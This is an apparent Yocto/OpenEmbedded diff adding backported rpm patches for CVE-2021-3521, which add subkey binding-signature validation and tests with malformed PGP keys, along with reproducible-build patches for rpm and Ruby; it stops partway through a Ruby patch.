index 00000000000..b374583017f
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0001-CVE-2021-3521.patch
@@ -0,0 +1,57 @@
+From 9a6871126f472feea057d5f803505ec8cc78f083 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:56:20 +0300
+Subject: [PATCH 1/3] Refactor pgpDigParams construction to helper function
+
+No functional changes, just to reduce code duplication and needed by
+the following commits.
+
+CVE: CVE-2021-3521
+Upstream-Staus: Backport[https://github.com/rpm-software-management/rpm/commit/9f03f42e2]
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ rpmio/rpmpgp.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index d0688ebe9a..e472b5320f 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1041,6 +1041,13 @@ unsigned int pgpDigParamsAlgo(pgpDigParams digp, unsigned int algotype)
+ return algo;
+ }
+
++static pgpDigParams pgpDigParamsNew(uint8_t tag)
++{
++ pgpDigParams digp = xcalloc(1, sizeof(*digp));
++ digp->tag = tag;
++ return digp;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ pgpDigParams * ret)
+ {
+@@ -1058,8 +1065,7 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ if (pkttype && pkt.tag != pkttype) {
+ break;
+ } else {
+- digp = xcalloc(1, sizeof(*digp));
+- digp->tag = pkt.tag;
++ digp = pgpDigParamsNew(pkt.tag);
+ }
+ }
+
+@@ -1105,8 +1111,7 @@ int pgpPrtParamsSubkeys(const uint8_t *pkts, size_t pktlen,
+ digps = xrealloc(digps, alloced * sizeof(*digps));
+ }
+
+- digps[count] = xcalloc(1, sizeof(**digps));
+- digps[count]->tag = PGPTAG_PUBLIC_SUBKEY;
++ digps[count] = pgpDigParamsNew(PGPTAG_PUBLIC_SUBKEY);
+ /* Copy UID from main key to subkey */
+ digps[count]->userid = xstrdup(mainkey->userid);
+
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/rpm/files/0001-build-pack.c-do-not-insert-payloadflags-into-.rpm-me.patch b/meta/recipes-devtools/rpm/files/0001-build-pack.c-do-not-insert-payloadflags-into-.rpm-me.patch
new file mode 100644
index 00000000000..79b168257ee
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0001-build-pack.c-do-not-insert-payloadflags-into-.rpm-me.patch
@@ -0,0 +1,28 @@
+From 2d351c666f09cc1b9e368422653fb42ac8b86249 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Tue, 31 Aug 2021 10:37:05 +0200
+Subject: [PATCH] build/pack.c: do not insert payloadflags into .rpm metadata
+
+The flags look like '19T56' where 19 is the compression level
+(deterministic), and 56 is the amount of threads (varies from one
+host to the next and breaks reproducibility for .rpm).
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ build/pack.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/build/pack.c b/build/pack.c
+index 932cb213e..b45d0726f 100644
+--- a/build/pack.c
++++ b/build/pack.c
+@@ -328,7 +328,7 @@ static char *getIOFlags(Package pkg)
+ headerPutString(pkg->header, RPMTAG_PAYLOADCOMPRESSOR, compr);
+ buf = xstrdup(rpmio_flags);
+ buf[s - rpmio_flags] = '\0';
+- headerPutString(pkg->header, RPMTAG_PAYLOADFLAGS, buf+1);
++ headerPutString(pkg->header, RPMTAG_PAYLOADFLAGS, "");
+ free(buf);
+ }
+ exit:
diff --git a/meta/recipes-devtools/rpm/files/0002-CVE-2021-3521.patch b/meta/recipes-devtools/rpm/files/0002-CVE-2021-3521.patch
new file mode 100644
index 00000000000..a8ff98fa26c
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0002-CVE-2021-3521.patch
@@ -0,0 +1,62 @@
+From c4b1bee51bbdd732b94b431a951481af99117703 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:51:10 +0300
+Subject: [PATCH 2/3] Process MPI's from all kinds of signatures
+
+No immediate effect but needed by the following commits.
+
+CVE: CVE-2021-3521
+Upstream-Status: Backport[https://github.com/rpm-software-management/rpm/commit/b5e8bc74b]
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ rpmio/rpmpgp.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index e472b5320f..57d411d1e0 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -515,7 +515,7 @@ pgpDigAlg pgpDigAlgFree(pgpDigAlg alg)
+ return NULL;
+ }
+
+-static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
++static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo,
+ const uint8_t *p, const uint8_t *h, size_t hlen,
+ pgpDigParams sigp)
+ {
+@@ -528,10 +528,8 @@ static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
+ int mpil = pgpMpiLen(p);
+ if (p + mpil > pend)
+ break;
+- if (sigtype == PGPSIGTYPE_BINARY || sigtype == PGPSIGTYPE_TEXT) {
+- if (sigalg->setmpi(sigalg, i, p))
+- break;
+- }
++ if (sigalg->setmpi(sigalg, i, p))
++ break;
+ p += mpil;
+ }
+
+@@ -604,7 +602,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ }
+
+ p = ((uint8_t *)v) + sizeof(*v);
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ case 4:
+ { pgpPktSigV4 v = (pgpPktSigV4)h;
+@@ -662,7 +660,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ if (p > (h + hlen))
+ return 1;
+
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ default:
+ rpmlog(RPMLOG_WARNING, _("Unsupported version of key: V%d\n"), version);
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/rpm/files/0003-CVE-2021-3521.patch b/meta/recipes-devtools/rpm/files/0003-CVE-2021-3521.patch
new file mode 100644
index 00000000000..d39ea7dacd7
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0003-CVE-2021-3521.patch
@@ -0,0 +1,332 @@
+From 07676ca03ad8afcf1ca95a2353c83fbb1d970b9b Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:59:30 +0300
+Subject: [PATCH 3/3] Validate and require subkey binding signatures on PGP
+ public keys
+
+All subkeys must be followed by a binding signature by the primary key
+as per the OpenPGP RFC, enforce the presence and validity in the parser.
+
+The implementation is as kludgey as they come to work around our
+simple-minded parser structure without touching API, to maximise
+backportability. Store all the raw packets internally as we decode them
+to be able to access previous elements at will, needed to validate ordering
+and access the actual data. Add testcases for manipulated keys whose
+import previously would succeed.
+
+Depends on the two previous commits:
+7b399fcb8f52566e6f3b4327197a85facd08db91 and
+236b802a4aa48711823a191d1b7f753c82a89ec5
+
+Fixes CVE-2021-3521.
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/bd36c5dc9]
+CVE:CVE-2021-3521
+
+Signed-off-by: Changqing Li <changqing.li@windriver.com>
+---
+ rpmio/rpmpgp.c | 100 ++++++++++++++++--
+ tests/Makefile.am | 3 +
+ tests/data/keys/CVE-2021-3521-badbind.asc | 25 +++++
+ .../data/keys/CVE-2021-3521-nosubsig-last.asc | 25 +++++
+ tests/data/keys/CVE-2021-3521-nosubsig.asc | 37 +++++++
+ tests/rpmsigdig.at | 28 +++++
+ 6 files changed, 211 insertions(+), 7 deletions(-)
+ create mode 100644 tests/data/keys/CVE-2021-3521-badbind.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig.asc
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index 57d411d1e0..b12410d671 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1046,35 +1046,121 @@ static pgpDigParams pgpDigParamsNew(uint8_t tag)
+ return digp;
+ }
+
++static int hashKey(DIGEST_CTX hash, const struct pgpPkt *pkt, int exptag)
++{
++ int rc = -1;
++ if (pkt->tag == exptag) {
++ uint8_t head[] = {
++ 0x99,
++ (pkt->blen >> 8),
++ (pkt->blen ),
++ };
++
++ rpmDigestUpdate(hash, head, 3);
++ rpmDigestUpdate(hash, pkt->body, pkt->blen);
++ rc = 0;
++ }
++ return rc;
++}
++
++static int pgpVerifySelf(pgpDigParams key, pgpDigParams selfsig,
++ const struct pgpPkt *all, int i)
++{
++ int rc = -1;
++ DIGEST_CTX hash = NULL;
++
++ switch (selfsig->sigtype) {
++ case PGPSIGTYPE_SUBKEY_BINDING:
++ hash = rpmDigestInit(selfsig->hash_algo, 0);
++ if (hash) {
++ rc = hashKey(hash, &all[0], PGPTAG_PUBLIC_KEY);
++ if (!rc)
++ rc = hashKey(hash, &all[i-1], PGPTAG_PUBLIC_SUBKEY);
++ }
++ break;
++ default:
++ /* ignore types we can't handle */
++ rc = 0;
++ break;
++ }
++
++ if (hash && rc == 0)
++ rc = pgpVerifySignature(key, selfsig, hash);
++
++ rpmDigestFinal(hash, NULL, NULL, 0);
++
++ return rc;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ pgpDigParams * ret)
+ {
+ const uint8_t *p = pkts;
+ const uint8_t *pend = pkts + pktlen;
+ pgpDigParams digp = NULL;
+- struct pgpPkt pkt;
++ pgpDigParams selfsig = NULL;
++ int i = 0;
++ int alloced = 16; /* plenty for normal cases */
++ struct pgpPkt *all = xmalloc(alloced * sizeof(*all));
+ int rc = -1; /* assume failure */
++ int expect = 0;
++ int prevtag = 0;
+
+ while (p < pend) {
+- if (decodePkt(p, (pend - p), &pkt))
++ struct pgpPkt *pkt = &all[i];
++ if (decodePkt(p, (pend - p), pkt))
+ break;
+
+ if (digp == NULL) {
+- if (pkttype && pkt.tag != pkttype) {
++ if (pkttype && pkt->tag != pkttype) {
+ break;
+ } else {
+- digp = pgpDigParamsNew(pkt.tag);
++ digp = pgpDigParamsNew(pkt->tag);
+ }
+ }
+
+- if (pgpPrtPkt(&pkt, digp))
++ if (expect) {
++ if (pkt->tag != expect)
++ break;
++ selfsig = pgpDigParamsNew(pkt->tag);
++ }
++
++ if (pgpPrtPkt(pkt, selfsig ? selfsig : digp))
+ break;
+
+- p += (pkt.body - pkt.head) + pkt.blen;
++ if (selfsig) {
++ /* subkeys must be followed by binding signature */
++ if (prevtag == PGPTAG_PUBLIC_SUBKEY) {
++ if (selfsig->sigtype != PGPSIGTYPE_SUBKEY_BINDING)
++ break;
++ }
++
++ int xx = pgpVerifySelf(digp, selfsig, all, i);
++
++ selfsig = pgpDigParamsFree(selfsig);
++ if (xx)
++ break;
++ expect = 0;
++ }
++
++ if (pkt->tag == PGPTAG_PUBLIC_SUBKEY)
++ expect = PGPTAG_SIGNATURE;
++ prevtag = pkt->tag;
++
++ i++;
++ p += (pkt->body - pkt->head) + pkt->blen;
++ if (pkttype == PGPTAG_SIGNATURE)
++ break;
++
++ if (alloced <= i) {
++ alloced *= 2;
++ all = xrealloc(all, alloced * sizeof(*all));
++ }
+ }
+
+- rc = (digp && (p == pend)) ? 0 : -1;
++ rc = (digp && (p == pend) && expect == 0) ? 0 : -1;
+
++ free(all);
+ if (ret && rc == 0) {
+ *ret = digp;
+ } else {
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index f742a9e1d2..328234278a 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -107,6 +107,9 @@ EXTRA_DIST += data/SPECS/hello-config-buildid.spec
+ EXTRA_DIST += data/SPECS/hello-cd.spec
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.pub
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.secret
++EXTRA_DIST += data/keys/CVE-2021-3521-badbind.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig-last.asc
+ EXTRA_DIST += data/macros.testfile
+ EXTRA_DIST += data/macros.debug
+ EXTRA_DIST += data/SOURCES/foo.c
+diff --git a/tests/data/keys/CVE-2021-3521-badbind.asc b/tests/data/keys/CVE-2021-3521-badbind.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-badbind.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
++HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
++91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
++eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
++7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
++1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
++c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
++CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
++Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
++BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
++XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
++fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
+++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
++BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
++zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
++iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
++Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
++KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
++L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig-last.asc b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++mQENBFjmORgBCAC7TMEk6wnjSs8Dr4yqSScWdU2pjcqrkTxuzdWvowcIUPZI0w/g
++HkRqGd4apjvY2V15kjL10gk3QhFP3pZ/9p7zh8o8NHX7aGdSGDK7NOq1eFaErPRY
++91LW9RiZ0lbOjXEzIL0KHxUiTQEmdXJT43DJMFPyW9fkCWg0OltiX618FUdWWfI8
++eySdLur1utnqBvdEbCUvWK2RX3vQZQdvEBODnNk2pxqTyV0w6VPQ96W++lF/5Aas
++7rUv3HIyIXxIggc8FRrnH+y9XvvHDonhTIlGnYZN4ubm9i4y3gOkrZlGTrEw7elQ
++1QeMyG2QQEbze8YjpTm4iLABCBrRfPRaQpwrABEBAAG0IXJwbS5vcmcgUlNBIHRl
++c3RrZXkgPHJzYUBycG0ub3JnPokBNwQTAQgAIQUCWOY5GAIbAwULCQgHAgYVCAkK
++CwIEFgIDAQIeAQIXgAAKCRBDRFkeGWTF/MxxCACnjqFL+MmPh9W9JQKT2DcLbBzf
++Cqo6wcEBoCOcwgRSk8dSikhARoteoa55JRJhuMyeKhhEAogE9HRmCPFdjezFTwgB
++BDVBpO2dZ023mLXDVCYX3S8pShOgCP6Tn4wqCnYeAdLcGg106N4xcmgtcssJE+Pr
++XzTZksbZsrTVEmL/Ym+R5w5jBfFnGk7Yw7ndwfQsfNXQb5AZynClFxnX546lcyZX
++fEx3/e6ezw57WNOUK6WT+8b+EGovPkbetK/rGxNXuWaP6X4A/QUm8O98nCuHYFQq
+++mvNdsCBqGf7mhaRGtpHk/JgCn5rFvArMDqLVrR9hX0LdCSsH7EGE+bR3r7wuQEN
++BFjmORgBCACk+vDZrIXQuFXEYToZVwb2attzbbJJCqD71vmZTLsW0QxuPKRgbcYY
++zp4K4lVBnHhFrF8MOUOxJ7kQWIJZMZFt+BDcptCYurbD2H4W2xvnWViiC+LzCMzz
++iMJT6165uefL4JHTDPxC2fFiM9yrc72LmylJNkM/vepT128J5Qv0gRUaQbHiQuS6
++Dm/+WRnUfx3i89SV4mnBxb/Ta93GVqoOciWwzWSnwEnWYAvOb95JL4U7c5J5f/+c
++KnQDHsW7sIiIdscsWzvgf6qs2Ra1Zrt7Fdk4+ZS2f/adagLhDO1C24sXf5XfMk5m
++L0OGwZSr9m5s17VXxfspgU5ugc8kBJfzABEBAAE=
++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig.asc b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+new file mode 100644
+index 0000000000..3a2e7417f8
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+@@ -0,0 +1,37 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++
++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
++E4XX4jtDmdZPreZALsiB
++=rRop
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/rpmsigdig.at b/tests/rpmsigdig.at
+index e1a3ab062a..705fc58705 100644
+--- a/tests/rpmsigdig.at
++++ b/tests/rpmsigdig.at
+@@ -240,6 +240,34 @@ gpg(185e6146f00650f8) = 4:185e6146f00650f8-58e63918
+ [])
+ AT_CLEANUP
+
++AT_SETUP([rpmkeys --import invalid keys])
++AT_KEYWORDS([rpmkeys import])
++RPMDB_INIT
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-badbind.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-badbind.asc: key 1 import failed.]
++)
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig.asc: key 1 import failed.]
++)
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig-last.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig-last.asc: key 1 import failed.]
++)
++AT_CLEANUP
++
+ # ------------------------------
+ # Test pre-built package verification
+ AT_SETUP([rpmkeys -K <signed> 1])
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/rpm/rpm_4.16.1.3.bb b/meta/recipes-devtools/rpm/rpm_4.16.1.3.bb
index 7c03b41fc82..5a347953faf 100644
--- a/meta/recipes-devtools/rpm/rpm_4.16.1.3.bb
+++ b/meta/recipes-devtools/rpm/rpm_4.16.1.3.bb
@@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org"
LICENSE = "GPL-2.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=c4eec0c20c6034b9407a09945b48a43f"
-SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.16.x \
+SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.16.x;protocol=https \
file://environment.d-rpm.sh \
file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \
file://0001-Do-not-read-config-files-from-HOME.patch \
@@ -40,6 +40,10 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.16.x \
file://0016-rpmscript.c-change-logging-level-around-scriptlets-t.patch \
file://0001-lib-transaction.c-fix-file-conflicts-for-MIPS64-N32.patch \
file://0001-tools-Add-error.h-for-non-glibc-case.patch \
+ file://0001-build-pack.c-do-not-insert-payloadflags-into-.rpm-me.patch \
+ file://0001-CVE-2021-3521.patch \
+ file://0002-CVE-2021-3521.patch \
+ file://0003-CVE-2021-3521.patch \
"
PE = "1"
@@ -58,7 +62,8 @@ AUTOTOOLS_AUXDIR = "${S}/build-aux"
# OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe
EXTRA_AUTORECONF_append = " --exclude=gnu-configize"
-EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=libgcrypt"
+# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages
+EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=libgcrypt --with-vendor=pc"
EXTRA_OECONF_append_libc-musl = " --disable-nls --disable-openmp"
# --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs
diff --git a/meta/recipes-devtools/ruby/ruby/0003-rdoc-build-reproducible-documentation.patch b/meta/recipes-devtools/ruby/ruby/0003-rdoc-build-reproducible-documentation.patch
new file mode 100644
index 00000000000..f92f0e1ba68
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/0003-rdoc-build-reproducible-documentation.patch
@@ -0,0 +1,35 @@
+From: Christian Hofstaedtler <zeha@debian.org>
+Date: Tue, 10 Oct 2017 15:04:34 -0300
+Subject: rdoc: build reproducible documentation
+
+- provide a fixed timestamp to the gzip compression
+
+Upstream-Status: Backport [debian]
+
+Signed-off-by: Antonio Terceiro <terceiro@debian.org>
+Signed-off-by: Christian Hofstaedtler <zeha@debian.org>
+---
+ lib/rdoc/generator/json_index.rb | 4 ++--
+ lib/rdoc/rdoc.rb | 2 +-
+ 2 files changed, 3 insertions(+), 3 deletions(-)
+
+--- a/lib/rdoc/generator/json_index.rb
++++ b/lib/rdoc/generator/json_index.rb
+@@ -178,7 +178,7 @@
+ debug_msg "Writing gzipped search index to %s" % outfile
+
+ Zlib::GzipWriter.open(outfile) do |gz|
+- gz.mtime = File.mtime(search_index_file)
++ gz.mtime = -1
+ gz.orig_name = search_index_file.basename.to_s
+ gz.write search_index
+ gz.close
+@@ -196,7 +196,7 @@
+ debug_msg "Writing gzipped file to %s" % outfile
+
+ Zlib::GzipWriter.open(outfile) do |gz|
+- gz.mtime = File.mtime(dest)
++ gz.mtime = -1
+ gz.orig_name = dest.basename.to_s
+ gz.write data
+ gz.close
diff --git a/meta/recipes-devtools/ruby/ruby/0004-lib-mkmf.rb-sort-list-of-object-files-in-generated-M.patch b/meta/recipes-devtools/ruby/ruby/0004-lib-mkmf.rb-sort-list-of-object-files-in-generated-M.patch
new file mode 100644
index 00000000000..e0aca0dcfc1
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/0004-lib-mkmf.rb-sort-list-of-object-files-in-generated-M.patch
@@ -0,0 +1,28 @@
+From: Reiner Herrmann <reiner@reiner-h.de>
+Date: Tue, 10 Oct 2017 15:06:13 -0300
+Subject: lib/mkmf.rb: sort list of object files in generated Makefile
+
+Without sorting the list explicitly, its order is indeterministic,
+because readdir() is also not deterministic.
+When the list of object files varies between builds, they are linked
+in a different order, which results in an unreproducible build.
+
+Upstream-Status: Backport [debian]
+
+Signed-off-by: Antonio Terceiro <terceiro@debian.org>
+Signed-off-by: Reiner Herrmann <reiner@reiner-h.de>
+---
+ lib/mkmf.rb | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/lib/mkmf.rb
++++ b/lib/mkmf.rb
+@@ -2315,7 +2315,7 @@
+ LIBS = #{$LIBRUBYARG} #{$libs} #{$LIBS}
+ ORIG_SRCS = #{orig_srcs.collect(&File.method(:basename)).join(' ')}
+ SRCS = $(ORIG_SRCS) #{(srcs - orig_srcs).collect(&File.method(:basename)).join(' ')}
+-OBJS = #{$objs.join(" ")}
++OBJS = #{$objs.sort.join(" ")}
+ HDRS = #{hdrs.map{|h| '$(srcdir)/' + File.basename(h)}.join(' ')}
+ LOCAL_HDRS = #{$headers.join(' ')}
+ TARGET = #{target}
diff --git a/meta/recipes-devtools/ruby/ruby/0005-Mark-Gemspec-reproducible-change-fixing-784225-too.patch b/meta/recipes-devtools/ruby/ruby/0005-Mark-Gemspec-reproducible-change-fixing-784225-too.patch
new file mode 100644
index 00000000000..b7faa58655b
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/0005-Mark-Gemspec-reproducible-change-fixing-784225-too.patch
@@ -0,0 +1,28 @@
+From: Christian Hofstaedtler <zeha@debian.org>
+Date: Tue, 10 Oct 2017 15:07:11 -0300
+Subject: Mark Gemspec-reproducible change fixing #784225, too
+
+I think the UTC date change will fix the Multi-Arch not-same file issue,
+too.
+
